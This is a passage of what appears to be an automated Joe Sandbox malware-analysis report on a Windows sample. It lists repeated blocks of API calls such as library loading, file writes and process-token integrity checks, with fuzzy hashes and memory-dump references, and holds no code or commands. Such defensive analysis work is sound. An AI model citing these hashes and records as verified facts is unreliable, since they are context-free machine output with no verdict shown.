                              • Associated: 00000000.00000002.2926776805.0000000000DAE000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926809931.0000000000DBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d90000_RQzHm5vLxs.jbxd
                              Yara matches
                              Similarity
                              • API ID: DirectoryInformationVolumeWindows
                              • String ID:
                              • API String ID: 3487004747-0
                              • Opcode ID: f88dd6ca47bb597b715103805e978ce65e3e50f7edc8375eb78f957fc0b7d2e2
                              • Instruction ID: 33bec57473c26ad38c42e4eb43c51680d50a91122bf3a7f7a97cd22d3cb6ddfa
                              • Opcode Fuzzy Hash: f88dd6ca47bb597b715103805e978ce65e3e50f7edc8375eb78f957fc0b7d2e2
                              • Instruction Fuzzy Hash: F0E065B2926218BF6B09DBA4DD0BCFFB2ACDE01221700425EF805C2200FAA0AE0006F4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetProcAddress.KERNEL32(00000000,?), ref: 00D95B32
                              Memory Dump Source
                              • Source File: 00000000.00000002.2926693193.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                              • Associated: 00000000.00000002.2926668067.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926720056.0000000000D9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926751865.0000000000DAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926776805.0000000000DAE000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926809931.0000000000DBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d90000_RQzHm5vLxs.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc
                              • String ID:
                              • API String ID: 190572456-0
                              • Opcode ID: 9229d457ebf9836144c4544624194b8368fe0201ffdea3da3bdcae59eb671282
                              • Instruction ID: 2abff13a6844b013c4ebb9da40af7423b041bc03b420a28c9c823c0fc8e0b8f5
                              • Opcode Fuzzy Hash: 9229d457ebf9836144c4544624194b8368fe0201ffdea3da3bdcae59eb671282
                              • Instruction Fuzzy Hash: 6EF08272CA071CAAEB10ABB4AC4BA9A7BAC9B05720F000176FD08A6291E566549583F1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2926693193.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                              • Associated: 00000000.00000002.2926668067.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926720056.0000000000D9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926751865.0000000000DAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926776805.0000000000DAE000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926809931.0000000000DBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d90000_RQzHm5vLxs.jbxd
                              Yara matches
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              • Opcode ID: 15be566e42d3ab941a225e623a9ed99d3dd5da42f9bbe7e52869b31e47dbed8e
                              • Instruction ID: 08eae47420972d33685bebf5d80e419056baa4ff5d8c1b654a7c59264b3704da
                              • Opcode Fuzzy Hash: 15be566e42d3ab941a225e623a9ed99d3dd5da42f9bbe7e52869b31e47dbed8e
                              • Instruction Fuzzy Hash: 24D012959D434C7AFB15E6E49D03FEE7B5CC705710F000595BA08A9181EAA69A5842B2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2926693193.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                              • Associated: 00000000.00000002.2926668067.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926720056.0000000000D9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926751865.0000000000DAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926776805.0000000000DAE000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926809931.0000000000DBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d90000_RQzHm5vLxs.jbxd
                              Yara matches
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              • Opcode ID: e8e68f9fed8c14f80bec72bee961cb5ca3c7929e258b0ca1b650f0534407f76b
                              • Instruction ID: 2bd9e1e73244dedd795f03726bdb7b25b0a1358807de344742f423d512cbb82e
                              • Opcode Fuzzy Hash: e8e68f9fed8c14f80bec72bee961cb5ca3c7929e258b0ca1b650f0534407f76b
                              • Instruction Fuzzy Hash: 63D01255EC434C7AEB21E6E46C07F9D775CD705711F400195BD08991C1EAA19A1842F2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2926693193.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                              • Associated: 00000000.00000002.2926668067.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926720056.0000000000D9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926751865.0000000000DAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926776805.0000000000DAE000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926809931.0000000000DBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d90000_RQzHm5vLxs.jbxd
                              Yara matches
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              • Opcode ID: ee214038215fb57273521b611f1e9c42eee1f52d4b342a9904ad80965c259d70
                              • Instruction ID: 911965673297f0d28bc31226b6de41bd86a2572251ade390bc9f96dbf54bf186
                              • Opcode Fuzzy Hash: ee214038215fb57273521b611f1e9c42eee1f52d4b342a9904ad80965c259d70
                              • Instruction Fuzzy Hash: 3CD012559C434C7AEB51F6E46D07F9E775C8715B10F4001A5BE18991C2EAA19A1842F2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2926693193.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                              • Associated: 00000000.00000002.2926668067.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926720056.0000000000D9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926751865.0000000000DAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926776805.0000000000DAE000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926809931.0000000000DBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d90000_RQzHm5vLxs.jbxd
                              Yara matches
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              • Opcode ID: 91b40f27c2df0f1f4aedada72899ca24fa295f91d4316c4b3e3ffd41aa3de84a
                              • Instruction ID: 659deae1bdfa89a08ca47a0351f526bea6dad4da2e61e5ab4d08d30d56e76fcd
                              • Opcode Fuzzy Hash: 91b40f27c2df0f1f4aedada72899ca24fa295f91d4316c4b3e3ffd41aa3de84a
                              • Instruction Fuzzy Hash: FAD012659C434C7AEB61F6E46C03F9E775C8705710F400595BE08991C2EAA69A5842F2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2926693193.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                              • Associated: 00000000.00000002.2926668067.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926720056.0000000000D9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926751865.0000000000DAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926776805.0000000000DAE000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926809931.0000000000DBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d90000_RQzHm5vLxs.jbxd
                              Yara matches
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              • Opcode ID: 5e065223eecf18bfe07814e72b2a54764c5ec3b4376d770976a1196d63b1cb32
                              • Instruction ID: 843708500106b7ffae634d732f599363cb24341cdfe18bd44371cd9640bb5b39
                              • Opcode Fuzzy Hash: 5e065223eecf18bfe07814e72b2a54764c5ec3b4376d770976a1196d63b1cb32
                              • Instruction Fuzzy Hash: 5FD01255E8434C7AEB11F6E46D43F9D775CD715710F400195BD08991C2EAA59A1842F2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2926693193.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                              • Associated: 00000000.00000002.2926668067.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926720056.0000000000D9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926751865.0000000000DAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926776805.0000000000DAE000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926809931.0000000000DBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d90000_RQzHm5vLxs.jbxd
                              Yara matches
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              • Opcode ID: ca6753d358d18e506dd7273101640aeaa0a5258811801651c3e15260717758a9
                              • Instruction ID: ec313afea8a25005074b4cfb0166331a891e398d819e19e7ff70652165f3fccd
                              • Opcode Fuzzy Hash: ca6753d358d18e506dd7273101640aeaa0a5258811801651c3e15260717758a9
                              • Instruction Fuzzy Hash: 9FD05B519D034C7AFB10F6E85D03FBE775CD705710F440595FD18AA1C2EAA19A5843B3
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2926693193.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                              • Associated: 00000000.00000002.2926668067.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926720056.0000000000D9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926751865.0000000000DAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926776805.0000000000DAE000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926809931.0000000000DBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d90000_RQzHm5vLxs.jbxd
                              Yara matches
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              • Opcode ID: 6b93e28ae066d7ecbb0003335ddfe36b3325b36901c71d2c03a1536d734a1190
                              • Instruction ID: 0224bab103f711e9c42ec5c53ee9728795116488293b0b67bdcb62013f870632
                              • Opcode Fuzzy Hash: 6b93e28ae066d7ecbb0003335ddfe36b3325b36901c71d2c03a1536d734a1190
                              • Instruction Fuzzy Hash: 9ED01255DC434C7AEB51E6E46C03F9D775C9705710F404195BD08991C2EAA19A1C43F2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2926693193.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                              • Associated: 00000000.00000002.2926668067.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926720056.0000000000D9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926751865.0000000000DAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926776805.0000000000DAE000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926809931.0000000000DBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d90000_RQzHm5vLxs.jbxd
                              Yara matches
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              • Opcode ID: 145d3324772be190b1dad11e8982314fa6ca273387fd6b9a9b91b89f6a1fae3b
                              • Instruction ID: 14b240d377070ac322c2fe385f8484e6ed265e50c4f3e2d53979c346e38142da
                              • Opcode Fuzzy Hash: 145d3324772be190b1dad11e8982314fa6ca273387fd6b9a9b91b89f6a1fae3b
                              • Instruction Fuzzy Hash: 56D0125598034C7AEB10E6E46D07F9E775C8705710F400195BD089A1C2FAA19A1842F2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateIoCompletionPort.KERNEL32(?,?,?,00000000,00000000,?,00D92DE9,?,?,00000000), ref: 00D95F60
                              Memory Dump Source
                              • Source File: 00000000.00000002.2926693193.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                              • Associated: 00000000.00000002.2926668067.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926720056.0000000000D9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926751865.0000000000DAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926776805.0000000000DAE000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926809931.0000000000DBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d90000_RQzHm5vLxs.jbxd
                              Yara matches
                              Similarity
                              • API ID: CompletionCreatePort
                              • String ID:
                              • API String ID: 499945625-0
                              • Opcode ID: 5da8568e09cea2b9a76e1c058a7a9a3295c002387f687f8561aaf26984dd3ce0
                              • Instruction ID: da87319a7c7a1ed43de3fc4dbbb0fac01a7781e9c86899fcf002d9c8a9b5134a
                              • Opcode Fuzzy Hash: 5da8568e09cea2b9a76e1c058a7a9a3295c002387f687f8561aaf26984dd3ce0
                              • Instruction Fuzzy Hash: 96D0A733104318BFDF004F94ED01AD63BA8EF08A20F008029F51D86550D632F810CB80
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateFileW.KERNEL32(?,?,?,00000000,?,?,00000000,?,00D93482,00000000,40000000,00000000,00000002,00000000,00000000,00000000), ref: 00D963CA
                              Memory Dump Source
                              • Source File: 00000000.00000002.2926693193.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                              • Associated: 00000000.00000002.2926668067.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926720056.0000000000D9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926751865.0000000000DAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926776805.0000000000DAE000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926809931.0000000000DBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d90000_RQzHm5vLxs.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateFile
                              • String ID:
                              • API String ID: 823142352-0
                              • Opcode ID: edbbb9354d5d781a192a281886aba516943bb860f6080098a2be988178c97f1f
                              • Instruction ID: df364ad20507466504f492075f9d7cb34843de9d06db2a72003694a634f3346a
                              • Opcode Fuzzy Hash: edbbb9354d5d781a192a281886aba516943bb860f6080098a2be988178c97f1f
                              • Instruction Fuzzy Hash: C3D0923214424DBFDF160FA0DC02B9A3F66AF09760F504618FA29980E0D673E470AB95
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RtlAllocateHeap.NTDLL(00D91A9D,00000008,00000000), ref: 00D93AEC
                              Memory Dump Source
                              • Source File: 00000000.00000002.2926693193.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                              • Associated: 00000000.00000002.2926668067.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926720056.0000000000D9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926751865.0000000000DAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926776805.0000000000DAE000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926809931.0000000000DBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d90000_RQzHm5vLxs.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeap
                              • String ID:
                              • API String ID: 1279760036-0
                              • Opcode ID: 48d3c1125c626c3b818b54adefa7adbd4c72a6086fa4c35dd1e0d7eabc33c6ec
                              • Instruction ID: 4e4f536df1d8c5618f1bd2434291612d7e352c02c9de40b40b5608fce871de70
                              • Opcode Fuzzy Hash: 48d3c1125c626c3b818b54adefa7adbd4c72a6086fa4c35dd1e0d7eabc33c6ec
                              • Instruction Fuzzy Hash: 3FC0123208060CAADF110E90EC05BAA3BA9BB00326F00C021FA0C88460DB7696609F60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetNativeSystemInfo.KERNEL32(?,?,?,?,00D9198A,00000000,00000000,?,00000000,?), ref: 00D9448B
                              Memory Dump Source
                              • Source File: 00000000.00000002.2926693193.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                              • Associated: 00000000.00000002.2926668067.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926720056.0000000000D9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926751865.0000000000DAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926776805.0000000000DAE000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926809931.0000000000DBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d90000_RQzHm5vLxs.jbxd
                              Yara matches
                              Similarity
                              • API ID: InfoNativeSystem
                              • String ID:
                              • API String ID: 1721193555-0
                              • Opcode ID: 1058c58b21a587101bc36d588f949c8f0b0d96b20863f7108f041b028d967630
                              • Instruction ID: 76e80c2d7b5275507b70c61354965a5e83bfdb9c075fb6233a2a42d07c665a19
                              • Opcode Fuzzy Hash: 1058c58b21a587101bc36d588f949c8f0b0d96b20863f7108f041b028d967630
                              • Instruction Fuzzy Hash: 38C0126681420C4ACB00EBF09909489B7FC960C210B400590D80592140F6669A5482A1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetNativeSystemInfo.KERNEL32(?,?,?,?,00D9198A,00000000,00000000,?,00000000,?), ref: 00D9448B
                              Memory Dump Source
                              • Source File: 00000000.00000002.2926693193.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                              • Associated: 00000000.00000002.2926668067.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926720056.0000000000D9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926751865.0000000000DAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926776805.0000000000DAE000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926809931.0000000000DBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d90000_RQzHm5vLxs.jbxd
                              Yara matches
                              Similarity
                              • API ID: InfoNativeSystem
                              • String ID:
                              • API String ID: 1721193555-0
                              • Opcode ID: 963cd383dc795f5c60bcbd1c2bd2626e41482b74073d8ccc09771ad9bf08cd62
                              • Instruction ID: ddc7d2f969f1f0da2f155b632a01627d361fb83ebfa5e91aed1834c68f3e7410
                              • Opcode Fuzzy Hash: 963cd383dc795f5c60bcbd1c2bd2626e41482b74073d8ccc09771ad9bf08cd62
                              • Instruction Fuzzy Hash: C7C01266C192084DCF00EBF099494CDBFF49A0D210B100699D806E2550E2668A58C761
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • HeapCreate.KERNEL32(00000000,00000000,00000000,?,00D9602E,00000000,00000000,?,00D92AE6,?,00000000,00000000), ref: 00D93B09
                              Memory Dump Source
                              • Source File: 00000000.00000002.2926693193.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                              • Associated: 00000000.00000002.2926668067.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926720056.0000000000D9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926751865.0000000000DAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926776805.0000000000DAE000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926809931.0000000000DBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d90000_RQzHm5vLxs.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateHeap
                              • String ID:
                              • API String ID: 10892065-0
                              • Opcode ID: 37e1e69452d90086281f76afed33ec5bff0e8e02b7588188e425fd85a6fac14a
                              • Instruction ID: 1b45db58e81302885a6b462cbd352f7b729bff1f091205898c1867fe6fc0de8c
                              • Opcode Fuzzy Hash: 37e1e69452d90086281f76afed33ec5bff0e8e02b7588188e425fd85a6fac14a
                              • Instruction Fuzzy Hash: 90C04C31244708EBEB409E98DD49BA937DCDB447A6F508010FA1DD95D0C7B1A9908AA5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • WriteFile.KERNEL32(?,?,00D92BF0,00000000,?,?,00D92C8B,?,?,?,?,?,?,?,?,?), ref: 00D961A5
                              Memory Dump Source
                              • Source File: 00000000.00000002.2926693193.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                              • Associated: 00000000.00000002.2926668067.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926720056.0000000000D9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926751865.0000000000DAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926776805.0000000000DAE000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926809931.0000000000DBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d90000_RQzHm5vLxs.jbxd
                              Yara matches
                              Similarity
                              • API ID: FileWrite
                              • String ID:
                              • API String ID: 3934441357-0
                              • Opcode ID: 3dafb90fd3953c006daedd68991f767ebc25c45cc939bed5df4094caf7d1e0d4
                              • Instruction ID: b6fdd8580319f96278ac1b8b38c0e73571ca7f56eed6acdd476ad7049ff25beb
                              • Opcode Fuzzy Hash: 3dafb90fd3953c006daedd68991f767ebc25c45cc939bed5df4094caf7d1e0d4
                              • Instruction Fuzzy Hash: 1AC0023615030DBFDF059F84ED05EAA3B69EB08611F008050BA189A561C672E9209BA5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • ReadFile.KERNEL32(?,?,00D92BFB,00000000,?,?,00D92A6D,?,?,?,?,?,?,00D92BFB,?,?), ref: 00D96171
                              Memory Dump Source
                              • Source File: 00000000.00000002.2926693193.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                              • Associated: 00000000.00000002.2926668067.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926720056.0000000000D9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926751865.0000000000DAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926776805.0000000000DAE000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926809931.0000000000DBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d90000_RQzHm5vLxs.jbxd
                              Yara matches
                              Similarity
                              • API ID: FileRead
                              • String ID:
                              • API String ID: 2738559852-0
                              • Opcode ID: a4038a405c8b797f46fd9f7e9cd94e68d9cc0a404d6e6ae715e5f02b247d5149
                              • Instruction ID: a45c4ae8d01b1f05aef7dc47bc771a79147a2daa3614fa9dd44048107439cb1f
                              • Opcode Fuzzy Hash: a4038a405c8b797f46fd9f7e9cd94e68d9cc0a404d6e6ae715e5f02b247d5149
                              • Instruction Fuzzy Hash: 62C0023615024CBFDF019F84EC05EAA3BA9EB08621F009050BA188A561C672E9609BA5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • WriteFile.KERNEL32(00000D0C,00000000,00D934AD,?,00000000,?,00D934AD,00000000,00000D0C,?), ref: 00D963EB
                              Memory Dump Source
                              • Source File: 00000000.00000002.2926693193.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                              • Associated: 00000000.00000002.2926668067.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926720056.0000000000D9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926751865.0000000000DAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926776805.0000000000DAE000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926809931.0000000000DBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d90000_RQzHm5vLxs.jbxd
                              Yara matches
                              Similarity
                              • API ID: FileWrite
                              • String ID:
                              • API String ID: 3934441357-0
                              • Opcode ID: 977c46b8f115dc036bfe16cfa1334d7534ffddc0a666a69c2ecfb76bc07bff52
                              • Instruction ID: eacf0fec3004797303abca5bf706494d506cd6a4f5521ccd3c2efc4703c3e34e
                              • Opcode Fuzzy Hash: 977c46b8f115dc036bfe16cfa1334d7534ffddc0a666a69c2ecfb76bc07bff52
                              • Instruction Fuzzy Hash: F4C0023204020DBBCF025F81ED05A993F2AEB09660F008010FA1854560C7729530AB95
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetCurrentProcess.KERNEL32(00D92DB7,?,?,00D935F3), ref: 00D94386
                                • Part of subcall function 00D94039: OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 00D9404B
                                • Part of subcall function 00D94039: GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),?,0000004C,00000000), ref: 00D94064
                                • Part of subcall function 00D94039: IsValidSid.ADVAPI32(?,00000000), ref: 00D94073
                              Memory Dump Source
                              • Source File: 00000000.00000002.2926693193.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                              • Associated: 00000000.00000002.2926668067.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926720056.0000000000D9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926751865.0000000000DAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926776805.0000000000DAE000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926809931.0000000000DBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d90000_RQzHm5vLxs.jbxd
                              Yara matches
                              Similarity
                              • API ID: ProcessToken$CurrentInformationOpenValid
                              • String ID:
                              • API String ID: 3181247963-0
                              • Opcode ID: cfb76723d5c7b7227fd7ca05332eea500cae70d87816dfcbfd7b6355130aff88
                              • Instruction ID: a90fb4cee5461d18de82cfedef0d986a25fa1eb1b2dbfc1b1d314f7077c4738c
